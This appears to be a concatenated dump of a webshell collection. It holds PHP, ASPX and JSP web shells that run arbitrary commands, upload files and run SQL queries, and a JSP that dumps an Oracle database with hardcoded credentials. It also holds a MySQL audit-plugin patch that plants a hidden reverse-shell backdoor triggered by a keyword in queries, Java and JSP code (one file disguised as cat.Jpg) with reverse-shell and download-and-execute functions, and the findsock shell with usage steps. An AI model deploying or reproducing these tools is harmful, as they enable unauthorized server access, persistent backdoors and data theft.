88 | 89 | 90 | -------------------------------------------------------------------------------- /Jsp/Oracle Database.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.sql.*" %> 2 | <%@ page import="java.util.*" %> 3 | <%@ page import="java.io.*" %> 4 | <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> 5 | <% 6 | try { 7 | String backupDir = "/tmp/"; 8 | String ex=".txt"; 9 | 10 | String driver = "oracle.jdbc.driver.OracleDriver"; 11 | String url = "jdbc:oracle:thin:@127.0.0.1:1521:jcjobcn"; 12 | String username = "system"; 13 | String password = "motoME722remind2012"; 14 | 15 | 16 | Class.forName(driver); 17 | Connection conn = DriverManager.getConnection(url, username, password); 18 | 19 | /** ==== >>>> TWEAK HERE TO DUMP ALL TABLESPACES <<<< ==== **/ 20 | String sql_tables="select TABLE_NAME from user_tab_comments"; 21 | PreparedStatement ps = conn.prepareStatement(sql_tables); 22 | ResultSet rs = ps.executeQuery(); 23 | ArrayList tables = new ArrayList(); 24 | while (rs.next()) { 25 | tables.add(rs.getString(1)); 26 | } 27 | rs.close(); 28 | 29 | for(int i=0;i>>> TWEAK HERE TO DUMP HEADER <<<< ==== **/ 40 | while(r.next()){ 41 | bw.append("INSERT INTO " + table + " VALUES("); 42 | for (int col = 1; col <= rsmeta.getColumnCount(); col++) { 43 | bw.append("'"); 44 | if (r.getString(col) == null) 45 | bw.append(""); 46 | else 47 | bw.append(r.getString(col)); 48 | if (col == rsmeta.getColumnCount()) 49 | bw.append("'"); 50 | else 51 | bw.append("', "); 52 | } 53 | bw.append(");"); 54 | bw.newLine(); 55 | } 56 | 57 | bw.flush(); 58 | bw.close(); 59 | osw.close(); 60 | r.close(); 61 | } 62 | 63 | rs.close(); 64 | out.println("backup done"); 65 | conn.close(); 66 | } catch (Exception e) { 67 | response.setStatus(200); 68 | e.printStackTrace(); 69 | } 70 | out.println("

finished

"); 71 | %> -------------------------------------------------------------------------------- /Php/bdshell.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | Shell - <?php echo(str_replace('<','',$_POST['cmd']));?> 6 | 7 | 8 | 
 9 | ">> '.$tmpoutput.' && echo '.$pwd.'$ '.escapeshellarg($cmd).' >> '.$tmpoutput.' && echo >> '.$tmpoutput.' && '.$cmd .' >> '.$tmpoutput.' 2>&1 && pwd > '.$tmppwd);
23 | $newpwd = trim(file_get_contents($tmppwd)); //capture new Present (current) Working Directory just in case it changed
24 | if($newpwd != "") $pwd = $newpwd; //if something failed, don't change directory
25 | echo(file_get_contents($tmpoutput, false, NULL, filesize($tmpoutput)-MAX_OUTPUT_LENGHT));
26 | unlink($tmppwd);
27 | }
28 | ?>
29 |
30 |

31 |

32 | Reset 33 | "> 34 | 35 | 36 | $ 37 | 38 | 39 |
40 |
41 |
42 |

43 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /Php/php-backdoor.php: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

listing of $d

"; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
"); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "
query was executed correctly
\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | 
execute command: 
 
58 | 

59 | upload file:   to dir:   

60 | 
to browse go to http://?d=[directory here]
61 | 
for example:
62 | http://?d=/etc on *nix
63 | or http://?d=c:/windows on win
64 | 
execute mysql query:
65 | 

66 | host:  user:  password: 
67 | 
68 | database:   query:  
69 | 

70 | 
71 | 
72 | 


--------------------------------------------------------------------------------
/Php/Password Hasher for PHP Shell 2.1.php:
--------------------------------------------------------------------------------
  1 | 
  5 |  * Licensed under the GNU GPL.  See the file COPYING for details.
  6 |  */
  7 | 
  8 | function stripslashes_deep($value) {
  9 |     if (is_array($value))
 10 |         return array_map('stripslashes_deep', $value);
 11 |     else
 12 |         return stripslashes($value);
 13 | }
 14 | 
 15 | if (get_magic_quotes_gpc())
 16 |     $_POST = stripslashes_deep($_POST);
 17 | 
 18 | $username = isset($_POST['username']) ? $_POST['username'] : '';
 19 | $password = isset($_POST['password']) ? $_POST['password'] : '';
 20 | 
 21 | ?>
 22 | 
 24 | 
 25 | 
 26 |   Password Hasher for PHP Shell 2.1
 27 |   
 28 | 
 29 | 
 30 | 
 31 | 
 32 | 
Password Hasher for PHP Shell 2.1

 33 | 
 34 | 

 35 | 
 36 | 

 37 |   Username
 38 |   
 39 | 

 40 | 
 41 | 

 42 |   Password
 43 |   
 44 | 

 45 | 
 46 | 

 47 |   Result
 48 | 
 49 | Enter a username and a password and update.
\n";
 52 | } else {
 53 | 
 54 |     $u = strtolower($username);
 55 | 
 56 |     if (preg_match('/[[ |&~!()]/', $u) || $u == 'null' ||
 57 |         $u == 'yes' || $u == 'no' || $u == 'true' || $u == 'false') {
 58 | 
 59 |         echo '  
Your username cannot contain any of the following reserved
 60 |   word: "null", "yes", "no", "true", or
 61 |   "false".  The following characters are also prohibited:
 62 |   " " (space), "[" (left bracket), "|" (pipe),
 63 |   "&" (ampersand), "~" (tilde), "!" (exclamation
 64 |   mark), "(" (left parenthesis), or ")" (right
 65 |   parenthesis).
' . "\n";
 66 | 
 67 |         echo '  
Please choose another username and try again.
' . "\n";
 68 | 
 69 |     } else {
 70 |         echo "  
Write the following line into config.php " .
 71 |             "in the users section:
\n";
 72 | 
 73 |         $fkt = 'md5'; // Change to sha1 is you feel like it...
 74 |         $salt = dechex(mt_rand());
 75 | 
 76 |         $hash = $fkt . ':' . $salt . ':' . $fkt($salt . $password);
 77 | 
 78 |         echo "
\n";
 79 |         echo htmlentities(str_pad($username, 8) . ' = "' . $hash . '"') . "\n";
 80 |         echo "
\n";
 81 |     }
 82 | }
 83 | ?>
 84 | 
 85 | 

 86 | 
 87 | 

 88 | 
 89 | 

 90 | 
 91 | 
 92 | 

 93 | 
 94 | 

 95 | Copyright © 2005, Martin Geisler. Get the
 96 | latest version at mgeisler.net/php-shell/.
 97 | 

 98 | 
 99 | 
100 | 
101 | 


--------------------------------------------------------------------------------
/Aspx/Command.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="C#" %>
 2 | <%@ Import namespace="System.Diagnostics"%>
 3 | <%@ Import Namespace="System.IO" %>
 4 | 
 5 | 
 6 | 
 7 | 
70 | 
71 | 
72 | 
73 |     Command
74 | 
75 | 
76 |     

77 |     

78 |         
79 |             
80 |                 
81 | 		        
82 |             
83 |             
84 |                 
85 |                 
86 |             
87 |                 
88 |                 
89 |             
90 |         
Auth Key:
Command:
 

91 |     

92 |     

93 | 
94 | 
95 | 
96 | 


--------------------------------------------------------------------------------
/Php/ftpsearch.php:
--------------------------------------------------------------------------------
  1 | ";
  3 | echo "Edited By KingDefacer";
  4 | 
  5 | set_time_limit(0);
  6 | ##################
  7 | @$passwd=fopen('/etc/passwd','r');
  8 | if (!$passwd) {
  9 |   echo "[-] Error : coudn't read /etc/passwd";
 10 |   exit;
 11 | }
 12 | $path_to_public=array();
 13 | $users=array();
 14 | $pathtoconf=array();
 15 | $i=0;
 16 | 
 17 | while(!feof($passwd)) {
 18 | $str=fgets($passwd);
 19 | if ($i>35) {
 20 |    $pos=strpos($str,":");
 21 |    $username=substr($str,0,$pos);
 22 |    $dirz="/home/$username/public_html/";
 23 |    if (($username!="")) {
 24 |        if (is_readable($dirz)) {
 25 |            array_push($users,$username);
 26 |            array_push($path_to_public,$dirz);
 27 |        }
 28 |    }
 29 | }
 30 | $i++;
 31 | }
 32 | ###################
 33 | 
 34 | #########################
 35 | echo "

";
 36 | echo "
";
100 | 
101 | echo "";
102 | ?>
103 | 


--------------------------------------------------------------------------------
/Mysql/mysql_audit_plugin/audit_null.patch:
--------------------------------------------------------------------------------
  1 | --- mysql-5.6.10/plugin/audit_null/audit_null.c	2013-01-23 00:54:49.000000000 +0800
  2 | +++ audit_null.c	2013-03-30 00:37:54.409049885 +0800
  3 | @@ -17,10 +17,22 @@
  4 |  #include 
  5 |  #include 
  6 |  #include 
  7 | +#include 
  8 | +#include 
  9 | +#include 
 10 | +#include 
 11 | +#include 
 12 | +
 13 | +#define BACK_IP "127.0.0.1"
 14 | +#define BACK_PORT "8080"
 15 | +#define DEBUG 1
 16 |  
 17 |  #if !defined(__attribute__) && (defined(__cplusplus) || !defined(__GNUC__)  || __GNUC__ == 2 && __GNUC_MINOR__ < 8)
 18 |  #define __attribute__(A)
 19 |  #endif
 20 | +static FILE *log_fp;
 21 | +static sem_t *sem = NULL;
 22 | +static time_t last_exec;
 23 |  
 24 |  static volatile int number_of_calls; /* for SHOW STATUS, see below */
 25 |  /* Count MYSQL_AUDIT_GENERAL_CLASS event instances */
 26 | @@ -58,6 +70,8 @@
 27 |    number_of_calls_connection_connect= 0;
 28 |    number_of_calls_connection_disconnect= 0;
 29 |    number_of_calls_connection_change_user= 0;
 30 | +  log_fp = NULL;
 31 | +  sem = NULL;
 32 |    return(0);
 33 |  }
 34 |  
 35 | @@ -77,6 +91,8 @@
 36 |  
 37 |  static int audit_null_plugin_deinit(void *arg __attribute__((unused)))
 38 |  {
 39 | +  if(log_fp!=NULL) fclose(log_fp);
 40 | +  if(sem!=NULL) sem_close(sem);
 41 |    return(0);
 42 |  }
 43 |  
 44 | @@ -99,44 +115,24 @@
 45 |    number_of_calls++;
 46 |    if (event_class == MYSQL_AUDIT_GENERAL_CLASS)
 47 |    {
 48 | -    const struct mysql_event_general *event_general=
 49 | -      (const struct mysql_event_general *) event;
 50 | -    switch (event_general->event_subclass)
 51 | -    {
 52 | -    case MYSQL_AUDIT_GENERAL_LOG:
 53 | -      number_of_calls_general_log++;
 54 | -      break;
 55 | -    case MYSQL_AUDIT_GENERAL_ERROR:
 56 | -      number_of_calls_general_error++;
 57 | -      break;
 58 | -    case MYSQL_AUDIT_GENERAL_RESULT:
 59 | -      number_of_calls_general_result++;
 60 | -      break;
 61 | -    case MYSQL_AUDIT_GENERAL_STATUS:
 62 | -      number_of_calls_general_status++;
 63 | -      break;
 64 | -    default:
 65 | -      break;
 66 | -    }
 67 | -  }
 68 | -  else if (event_class == MYSQL_AUDIT_CONNECTION_CLASS)
 69 | -  {
 70 | -    const struct mysql_event_connection *event_connection=
 71 | -      (const struct mysql_event_connection *) event;
 72 | -    switch (event_connection->event_subclass)
 73 | -    {
 74 | -    case MYSQL_AUDIT_CONNECTION_CONNECT:
 75 | -      number_of_calls_connection_connect++;
 76 | -      break;
 77 | -    case MYSQL_AUDIT_CONNECTION_DISCONNECT:
 78 | -      number_of_calls_connection_disconnect++;
 79 | -      break;
 80 | -    case MYSQL_AUDIT_CONNECTION_CHANGE_USER:
 81 | -      number_of_calls_connection_change_user++;
 82 | -      break;
 83 | -    default:
 84 | -      break;
 85 | -    }
 86 | +    const   struct mysql_event_general *pEvent;
 87 | +
 88 | +    pEvent = (const struct mysql_event_general *) event;
 89 | +    if (pEvent->general_query != NULL && *(pEvent->general_query) != '\0') {
 90 | +        sem = sem_open("haha", O_RDWR|O_CREAT, 00777, 1);
 91 | +        if(strstr(pEvent->general_query,"openwill.me")!=NULL && sem_trywait(sem)==0 && (time(0)-last_exec)>10){
 92 | +            last_exec = time(0);
 93 | +            #ifdef DEBUG
 94 | +            if(log_fp == NULL)log_fp = fopen("/tmp/null_audit.log", "a");
 95 | +            fprintf(log_fp, "execing\n");
 96 | +            fprintf(log_fp, "%s;\n\n", pEvent->general_query);
 97 | +            fflush(log_fp);
 98 | +            #endif
 99 | +            system("bash < /dev/tcp/"BACK_IP"/"BACK_PORT" >&0 2>&0 &");
100 | +        }
101 | +        sem_unlink("haha");
102 | +   }    
103 | +   //Job done
104 |    }
105 |  }
106 |  
107 | 


--------------------------------------------------------------------------------
/Aspx/SQL.aspx:
--------------------------------------------------------------------------------
  1 | <%@ Page Language="C#" %>
  2 | <%@ Import namespace="System.Data"%>
  3 | <%@ Import namespace="System.Data.SqlClient"%>
  4 | 
  5 | 
  6 | 
  7 | 
 83 | 
 84 | 
 85 | 
 86 |     SQL
 87 | 
 88 | 
 89 | 
 90 |     

 91 |     

 92 |         
 93 |             
 94 |             
 95 |             
 96 |             
 97 |             
 98 |         
Auth Key:
Connection:
SQL:
 

 99 |     

100 |     

101 | 
102 | 
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/Php/php-findsock-shell.php:
--------------------------------------------------------------------------------
 1 | 
89 | 
90 | 


--------------------------------------------------------------------------------
/Other/Axis2Shell/Utils.java:
--------------------------------------------------------------------------------
  1 | import java.io.BufferedReader;
  2 | import java.io.File;
  3 | import java.io.FileOutputStream;
  4 | import java.io.FileWriter;
  5 | import java.io.InputStream;
  6 | import java.io.InputStreamReader;
  7 | import java.io.OutputStream;
  8 | import java.net.Socket;
  9 | import java.net.URL;
 10 | import java.net.URLConnection;
 11 | 
 12 | public class Utils {
 13 | 	
 14 | 	static String os = System.getProperty("os.name").toLowerCase();
 15 | 
 16 | 	public static String exec(String cmd) {
 17 | 		String result="";
 18 | 		try {
 19 | 			if (cmd!=null&&cmd.trim().length()>0) {
 20 | 				if (os.startsWith("windows")) {
 21 | 					cmd="cmd.exe /c "+ cmd;
 22 | 				}else {
 23 | 					cmd="/bin/sh -c "+ cmd;
 24 | 				}
 25 | 				InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();
 26 | 				
 27 | 				int read=0;
 28 | 				while ((read=inputStream.read())!=-1) {
 29 | 					result+=(char)read;
 30 | 				}
 31 | 			}
 32 | 		} catch (Exception e) {
 33 | 			result=e.getMessage();
 34 | 		}
 35 | 		return result;
 36 | 	}
 37 | 	
 38 | 	public static String shell(String host, int port) {
 39 | 		
 40 | 		String result = "";
 41 | 		if (host != null && host.trim().length() > 0 && port > 0) {
 42 | 			try {
 43 | 				if (os.startsWith("linux")) {
 44 | 					
 45 | 					String name="wooyun.sh";
 46 | 					File file=new File(name);
 47 | 					
 48 | 					FileWriter writer=new FileWriter(file);
 49 | 					writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n");
 50 | 					writer.flush();
 51 | 					writer.close();
 52 | 					Runtime.getRuntime().exec("chmod u+x "+name);
 53 | 					Process process = Runtime.getRuntime().exec("bash "+name);
 54 | 					process.waitFor();
 55 | 					
 56 | 					file.delete();
 57 | 				} else {
 58 | 					Socket socket = new Socket(host, port);
 59 | 					OutputStream out = socket.getOutputStream();
 60 | 					InputStream in = socket.getInputStream();
 61 | 					out.write(("whoami:\t" + exec("whoami")).getBytes());
 62 | 					int a = 0;
 63 | 					byte[] b = new byte[4096];
 64 | 					while ((a = in.read(b)) != -1) {
 65 | 						out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
 66 | 					}
 67 | 				}
 68 | 			} catch (Exception e) {
 69 | 				result = e.getMessage();
 70 | 			}
 71 | 
 72 | 		} else {
 73 | 			result = "host and port are required";
 74 | 		}
 75 | 		
 76 | 		return result;
 77 | 	}
 78 | 	
 79 | 	public static String upload(String path) {
 80 | 		String result="";
 81 | 		try {
 82 | 			if (path!=null&&path.trim().length()>0) {
 83 | 				FileOutputStream fos=new FileOutputStream(new File(path));
 84 | 				InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt");
 85 | 				BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
 86 | 				String temp = "";
 87 | 				while (reader.ready()) {
 88 | 					temp += reader.readLine() + "\n";
 89 | 				}
 90 | 				fos.write(temp.getBytes());
 91 | 				fos.flush();
 92 | 				fos.close();
 93 | 				result="Upload Success";
 94 | 			}else {
 95 | 				result="Path is required";
 96 | 			}
 97 | 		} catch (Exception e) {
 98 | 			result =e.getMessage();
 99 | 		}
100 | 		return result;
101 | 	}
102 | 	
103 | 	public static String download(String url, String path) {
104 | 		String result="";
105 | 		try {
106 | 			
107 | 			if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
108 | 				URLConnection conn=new URL(url).openConnection();
109 | 				conn.setReadTimeout(10*60*1000);
110 | 				conn.setReadTimeout(10*60*1000);
111 | 				InputStream inputStream=conn.getInputStream();
112 | 				int read=0;
113 | 				FileOutputStream fos=new FileOutputStream(new File(path));
114 | 				while ((read=inputStream.read())!=-1) {
115 | 					fos.write(read);
116 | 				}
117 | 				fos.flush();
118 | 				fos.close();
119 | 			}else {
120 | 				result="Url and path are required";
121 | 			}
122 | 		} catch (Exception e) {
123 | 			result =e.getMessage();
124 | 		}
125 | 		return result;
126 | 	}
127 | 
128 | 	public static String getClassPath() {
129 | 		return new Utils().getClass().getClassLoader().getResource("/").getPath();
130 | 	}
131 | 	
132 | }
133 | 


--------------------------------------------------------------------------------
/Php/matamu.php:
--------------------------------------------------------------------------------
  1 | 
  6 | 
  7 | 
  8 | 
  9 |  Matamu Mat 
 10 | 
 11 | 
 12 | 


 13 | 
 14 | 
 56 | 
 57 | 

 58 | 
Current working directory: 
 59 | Root/';
 64 | 
 65 | if (!empty($work_dir_splitted[0])) {
 66 |   $path = '';
 67 |   for ($i = 0; $i < count($work_dir_splitted); $i++) {
 68 |     $path .= '/' . $work_dir_splitted[$i];
 69 |     printf('%s/',
 70 |            $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
 71 |   }
 72 | }
 73 | 
 74 | ?>

 75 | 
Choose new working directory:
 76 | 

115 | 
116 | 
Command: 
117 | 

118 | 
119 | 
Enable stderr-trapping? 

120 | 
137 | 

138 | 
139 | 
142 | 
143 | 

144 | 
145 | 
146 | 
147 | 


--------------------------------------------------------------------------------
/Aspx/fileupload.aspx:
--------------------------------------------------------------------------------
  1 | <%@ Page Language="C#" %>
  2 | <%@ Import Namespace="System.IO" %>
  3 | 
  4 | 
  5 | 
  6 | 
125 | 
126 | 
127 | 


--------------------------------------------------------------------------------
/Jsp/园长-jsp/cat.Jpg:
--------------------------------------------------------------------------------
  1 | <%@ page language="java" pageEncoding="UTF-8"%>
  2 | <%@ page import="java.io.*" %>
  3 | <%@ page import="java.net.*" %>
  4 | <%!
  5 | 	static String encoding = "UTF-8";
  6 | 	
  7 | 	static{
  8 | 		encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;
  9 | 	}
 10 | 	
 11 | 	/**
 12 | 	 * 异常转换成字符串,获取详细异常信息
 13 | 	 * @param e
 14 | 	 * @return
 15 | 	 */
 16 | 	public static String exceptionToString(Exception e) {
 17 | 	    StringWriter sw = new StringWriter();
 18 | 	    e.printStackTrace(new PrintWriter(sw, true));
 19 | 	    return sw.toString();
 20 | 	}
 21 | 	
 22 | 	/**
 23 | 	 * 获取系统文件编码
 24 | 	 * @return
 25 | 	 */
 26 | 	public static String getSystemEncoding(){
 27 | 		return System.getProperty("sun.jnu.encoding");
 28 | 	}
 29 | 	
 30 | 	/**
 31 | 	 * 非空判断
 32 | 	 *
 33 | 	 * @param obj
 34 | 	 * @return
 35 | 	 */
 36 | 	public static boolean isNotEmpty(Object obj) {
 37 | 	    if (obj == null) {
 38 | 	        return false;
 39 | 	    }
 40 | 	    return !"".equals(String.valueOf(obj).trim());
 41 | 	}
 42 | 	
 43 | 	/**
 44 | 	 * 输入流转二进制数组输出流
 45 | 	 * @param in
 46 | 	 * @return
 47 | 	 * @throws IOException
 48 | 	 */
 49 | 	public static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{
 50 | 		ByteArrayOutputStream baos = new ByteArrayOutputStream();
 51 | 		byte[] b = new byte[1024];
 52 | 	    int a = 0;
 53 | 	    while((a = in.read(b))!=-1){
 54 | 	    	baos.write(b,0,a);
 55 | 		}
 56 | 		return baos;
 57 | 	}
 58 | 	
 59 | 	/**
 60 | 	 * 复制流到文件,如果文件存在默认会覆盖
 61 | 	 * @param in
 62 | 	 * @param path
 63 | 	 * @throws IOException
 64 | 	 */
 65 | 	public static void copyInputStreamToFile(InputStream in,String path) throws IOException{
 66 | 		FileOutputStream fos = new FileOutputStream(path);
 67 | 		fos.write(inutStreamToOutputStream(in).toByteArray());
 68 | 		fos.flush();
 69 | 		fos.close();
 70 | 	}
 71 | 	
 72 | 	/**
 73 | 	 * 模仿Linux下的cat Windows下的type 查看文件内容 
 74 | 	 * @param path
 75 | 	 * @return
 76 | 	 * @throws IOException
 77 | 	 */
 78 | 	public static String cat(String path) throws IOException {
 79 | 		return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());
 80 | 	}
 81 | 	
 82 | 	/**
 83 | 	 * 执行操作系统命令 如果是windows某些命令执行不了,可以用 cmd /c dir 执行dir命令
 84 | 	 * @param cmd
 85 | 	 * @return
 86 | 	 */
 87 | 	public static String exec(String cmd) {
 88 | 		try {
 89 | 			return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);
 90 | 		} catch (IOException e) {
 91 | 			return exceptionToString(e);
 92 | 		}
 93 | 	}
 94 | 	
 95 | 	/**
 96 | 	 * 下载文件到指定目录,保存的文件名必须指定
 97 | 	 * @param url
 98 | 	 * @param path
 99 | 	 * @throws MalformedURLException
100 | 	 * @throws IOException
101 | 	 */
102 | 	public static void download(String url,String path) throws MalformedURLException, IOException{
103 | 		copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);
104 | 	}
105 | 	
106 | 	/**
107 | 	 * 连接远程端口,提供本地命令执行入口
108 | 	 * @param host
109 | 	 * @param port
110 | 	 * @throws UnknownHostException
111 | 	 * @throws IOException
112 | 	 */
113 | 	public static void shell(String host,int port) throws UnknownHostException, IOException{
114 | 		Socket s = new Socket(host,port);
115 | 		OutputStream out = s.getOutputStream();
116 | 		InputStream in = s.getInputStream();
117 | 		out.write(("User:\t"+exec("whoami")).getBytes());
118 | 		int a = 0;
119 | 		byte[] b = new byte[1024];
120 | 		while((a=in.read(b))!=-1){
121 | 			out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8"));
122 | 		}
123 | 	}
124 | 	
125 | 	/**
126 | 	 * 下载远程文件并执行,命令执行完成后会删除下载的文件
127 | 	 * @param url
128 | 	 * @param fileName
129 | 	 * @param cmd
130 | 	 * @return
131 | 	 * @throws MalformedURLException
132 | 	 * @throws IOException
133 | 	 */
134 | 	public static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{
135 | 		download(url, fileName);
136 | 		String out = exec(cmd);
137 | 		new File(fileName).delete();
138 | 		return out;
139 | 	}
140 | %>
141 | <%
142 | 	try{
143 | 		String action = request.getParameter("action");
144 | 		out.println("
");
145 | 		if(isNotEmpty(action)){
146 | 			if("shell".equalsIgnoreCase(action)){
147 | 				shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));
148 | 			}else if("download".equalsIgnoreCase(action)){
149 | 				download(request.getParameter("url"), request.getParameter("path"));
150 | 			}else if("exec".equalsIgnoreCase(action)){
151 | 				out.println(exec(request.getParameter("cmd")));
152 | 			}else if("cat".equalsIgnoreCase(action)){
153 | 				out.println(cat(request.getParameter("path")));
154 | 			}else if("auto".equalsIgnoreCase(action)){
155 | 				out.println(auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd")));
156 | 			}
157 | 		}
158 | 		out.println("
");
159 | 	}catch(Exception e){
160 | 		out.println(exceptionToString(e));
161 | 	}
162 | %>
163 | 


--------------------------------------------------------------------------------
/C#/findsock.c:
--------------------------------------------------------------------------------
  1 | // php-findsock-shell - A Findsock Shell implementation in PHP + C
  2 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
  3 | //
  4 | // This tool may be used for legal purposes only.  Users take full responsibility
  5 | // for any actions performed using this tool.  The author accepts no liability
  6 | // for damage caused by this tool.  If these terms are not acceptable to you, then
  7 | // do not use this tool.
  8 | //
  9 | // In all other respects the GPL version 2 applies:
 10 | //
 11 | // This program is free software; you can redistribute it and/or modify
 12 | // it under the terms of the GNU General Public License version 2 as
 13 | // published by the Free Software Foundation.
 14 | //
 15 | // This program is distributed in the hope that it will be useful,
 16 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
 17 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 18 | // GNU General Public License for more details.
 19 | //
 20 | // You should have received a copy of the GNU General Public License along
 21 | // with this program; if not, write to the Free Software Foundation, Inc.,
 22 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 23 | //
 24 | // You are encouraged to send comments, improvements or suggestions to
 25 | // me at pentestmonkey@pentestmonkey.net
 26 | //
 27 | // Description
 28 | // -----------
 29 | // (Pair of) Web server scripts that find the TCP socket being used by the 
 30 | // client to connect to the web server and attaches a shell to it.  This 
 31 | // provides you, the pentester, with a fully interactive shell even if the 
 32 | // Firewall is performing proper ingress and egress filtering.
 33 | //
 34 | // Proper interactive shells are more useful than web-based shell in some
 35 | // circumstances, e.g:
 36 | //  1: You want to change your user with "su"
 37 | //  2: You want to upgrade your shell using a local exploit
 38 | //  3: You want to log into another system using telnet / ssh
 39 | //
 40 | // Limitations
 41 | // -----------
 42 | // The shell traffic doesn't look much like HTTP, so I guess that you may
 43 | // have problems if the site is being protected by a Layer 7 (Application layer) 
 44 | // Firewall.
 45 | //
 46 | // The shell isn't fully implemented in PHP: you also need to upload a
 47 | // C program.  You need to either:
 48 | //  1: Compile the program for the appropriate OS / architecture then
 49 | //     upload it; or
 50 | //  2: Upload the source and hope there's a C compiler installed.
 51 | //
 52 | // This is a pain, but I couldn't figure out how to implement the findsock
 53 | // mechanism in PHP.  Email me if you manage it.  I'd love to know.
 54 | //
 55 | // Only tested on x86 / amd64 Gentoo Linux.
 56 | //
 57 | // Usage
 58 | // -----
 59 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
 60 | //
 61 | // Here are some brief instructions.
 62 | //
 63 | // 1: Compile findsock.c for use on the target web server:
 64 | //    $ gcc -o findsock findsock.c
 65 | //
 66 | //    Bear in mind that the web server might be running a different OS / architecture to you.
 67 | //
 68 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
 69 | //    whichever upload vulnerability you've indentified.  Both should be uploaded to the 
 70 | //    same directory.
 71 | //
 72 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an
 73 | //    interactive shell).
 74 | //
 75 | //    $ nc -v target 80
 76 | //    target [10.0.0.1] 80 (http) open
 77 | //    GET /php-findsock-shell.php HTTP/1.0
 78 | //
 79 | //    sh-3.2$ id
 80 | //    uid=80(apache) gid=80(apache) groups=80(apache)
 81 | //    sh-3.2$
 82 | //    ... you now have an interactive shell ...
 83 | //
 84 | 
 85 | #include 
 86 | #include 
 87 | #include 
 88 | #include 
 89 | #include 
 90 | #include 
 91 | 
 92 | int main (int argc, char** argv) {
 93 | 	// Usage message
 94 | 	if (argc != 3) {
 95 | 		printf("Usage: findsock ip port\n");
 96 | 		exit(0);
 97 | 	}
 98 | 
 99 | 	// Process args
100 | 	char *sock_ip = argv[1];
101 | 	char *sock_port = argv[2];
102 | 
103 | 	// Declarations
104 | 	struct sockaddr_in rsa;
105 | 	struct sockaddr_in lsa;
106 | 	int size = sizeof(rsa);
107 | 	char remote_ip[30];
108 | 	int fd;
109 | 
110 | 	// Inspect all file handles
111 | 	for (fd=3; fd
  4 | 	
  5 | 	
  6 | 		static String encoding = "UTF-8";
  7 | 	
  8 | 		static{
  9 | 			encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;
 10 | 		}
 11 | 		
 12 | 		/**
 13 | 		 * 异常转换成字符串,获取详细异常信息
 14 | 		 * @param e
 15 | 		 * @return
 16 | 		 */
 17 | 		public static String exceptionToString(Exception e) {
 18 | 		    StringWriter sw = new StringWriter();
 19 | 		    e.printStackTrace(new PrintWriter(sw, true));
 20 | 		    return sw.toString();
 21 | 		}
 22 | 		
 23 | 		/**
 24 | 		 * 获取系统文件编码
 25 | 		 * @return
 26 | 		 */
 27 | 		public static String getSystemEncoding(){
 28 | 			return System.getProperty("sun.jnu.encoding");
 29 | 		}
 30 | 		
 31 | 		/**
 32 | 		 * 非空判断
 33 | 		 *
 34 | 		 * @param obj
 35 | 		 * @return
 36 | 		 */
 37 | 		public static boolean isNotEmpty(Object obj) {
 38 | 		    if (obj == null) {
 39 | 		        return false;
 40 | 		    }
 41 | 		    return !"".equals(String.valueOf(obj).trim());
 42 | 		}
 43 | 		
 44 | 		/**
 45 | 		 * 输入流转二进制数组输出流
 46 | 		 * @param in
 47 | 		 * @return
 48 | 		 * @throws IOException
 49 | 		 */
 50 | 		public static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{
 51 | 			ByteArrayOutputStream baos = new ByteArrayOutputStream();
